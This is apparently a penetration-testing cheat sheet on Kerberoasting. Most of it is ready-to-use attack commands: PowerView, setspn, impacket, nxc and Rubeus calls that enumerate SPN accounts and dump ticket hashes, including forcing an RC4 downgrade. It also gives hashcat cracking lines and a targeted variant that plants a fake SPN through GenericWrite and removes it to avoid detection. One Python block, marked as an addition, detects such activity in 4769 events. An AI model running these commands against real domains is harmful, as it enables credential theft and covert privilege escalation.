Kerberoasting

Any authenticated domain user can request a TGS (service ticket) for any account with a registered SPN. The KDC encrypts part of the TGS with the service account's NTLM hash: take that ticket offline and crack the hash without further interaction with the domain.

Why It Works

  • SPNs identify service accounts (e.g. MSSQLSvc/db.domain.local:1433)
  • The TGS is encrypted with RC4-HMAC (etype 23) or AES256 (etype 18) using the service account's password hash
  • No special privileges required: any domain user can request tickets
  • RC4 hashes crack significantly faster than AES256
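Every TGS request in the list above is also logged by the KDC as Security event 4769, which is where defenders see it. The following detection sketch is an added example, not part of the original page: it flags RC4 (0x17) service tickets issued for user-held SPN accounts and a single requester pulling tickets for several service accounts in a short window. The event records are constructed, with field names simplified from the 4769 XML (TargetUserName, ServiceName, TicketEncryptionType); the threshold and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"                    # etype 23; AES256 is 0x12 (etype 18)
BURST_THRESHOLD = 3                   # distinct service accounts per requester...
BURST_WINDOW = timedelta(minutes=5)   # ...within this window (assumed values)

# Constructed 4769-style events (fields simplified from the event XML): jdoe pulls
# tickets for three service accounts in seconds; asmith requests one AES ticket later.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "requester": "jdoe@DOMAIN.LOCAL", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-05-01T10:00:02", "requester": "jdoe@DOMAIN.LOCAL", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-05-01T10:00:03", "requester": "jdoe@DOMAIN.LOCAL", "service": "svc_backup", "etype": "0x12"},
    {"time": "2024-05-01T10:00:04", "requester": "jdoe@DOMAIN.LOCAL", "service": "WS01$", "etype": "0x12"},
    {"time": "2024-05-01T10:00:05", "requester": "asmith@DOMAIN.LOCAL", "service": "krbtgt", "etype": "0x12"},
    {"time": "2024-05-01T13:30:00", "requester": "asmith@DOMAIN.LOCAL", "service": "svc_sql", "etype": "0x12"},
]


def is_user_service_account(service_name):
    # Computer accounts end in '$' and krbtgt appears on every TGT renewal; both are
    # excluded because Kerberoasting targets user-held SPN accounts.
    account = service_name.split("/")[0]   # tolerate "MSSQLSvc/host:1433" style names
    return not account.endswith("$") and account.lower() != "krbtgt"


def detect_kerberoasting(events, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Return (signal, requester, detail) tuples for suspicious TGS requests."""
    findings = []
    per_requester = defaultdict(list)
    for ev in events:
        if not is_user_service_account(ev["service"]):
            continue
        if ev["etype"] == RC4_ETYPE:
            # RC4 tickets are the fast-to-crack ones; in an AES-capable domain a
            # 0x17 request for an AES account is a downgrade worth a look
            findings.append(("rc4_service_ticket", ev["requester"], ev["service"]))
        per_requester[ev["requester"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    for requester, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(services) >= threshold:
                findings.append(("service_ticket_burst", requester, sorted(services)))
                break   # one burst finding per requester is enough
    return findings
```

Running `detect_kerberoasting(SAMPLE_EVENTS)` yields two RC4 findings and one burst finding for jdoe, and nothing for asmith's single AES request.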

Finding Kerberoastable Accounts

Look for user accounts (not computer accounts) with SPNs: service accounts are the target, especially ones that look like they have weak passwords.

```powershell
# PowerView
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname, description

# setspn (built-in)
setspn -T domain.local -Q */*
```

```bash
# impacket: list without requesting
GetUserSPNs.py domain.local/user:pass -dc-ip <ip>

# nxc
nxc ldap <ip> -u user -p pass --kerberoast output.txt
```

Requesting Hashes

Request the TGS and save hashes for offline cracking.

```bash
# impacket: request all Kerberoastable hashes
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request -outputfile hashes.txt

# Request for specific account
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request-user svc_sql -outputfile hashes.txt
```

```powershell
# Rubeus: all accounts
Rubeus.exe kerberoast /outfile:hashes.txt

# Rubeus: specific account
Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

# Force RC4 (faster to crack: downgrade if AES is returned)
Rubeus.exe kerberoast /tgtdeleg /rc4opsec /outfile:hashes.txt
```

Cracking

RC4 hashes (etype 23, starting with $krb5tgs$23$) crack much faster than AES256 hashes: try to force RC4 with /tgtdeleg if the service account is RC4 capable.

```bash
# RC4 (etype 23): hashcat mode 13100
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# AES256 (etype 18): hashcat mode 19700
hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
```

Targeted Kerberoasting

If you have GenericWrite on a user account, you can set an SPN on it, request the TGS, then clean up. This is useful for accounts that don't normally have SPNs.

```powershell
# Step 1: Set SPN on target account
Set-DomainObject -Identity target_user -Set @{serviceprincipalname='fake/spn.domain.local'}

# Verify it was set
Get-DomainUser target_user | Select-Object serviceprincipalname
```

```bash
# Step 2: Request the TGS
GetUserSPNs.py domain.local/user:pass -dc-ip <ip> -request-user target_user -outputfile targeted.txt
```

```powershell
# Step 3: Clean up (remove SPN to avoid detection)
Set-DomainObject -Identity target_user -Clear serviceprincipalname
```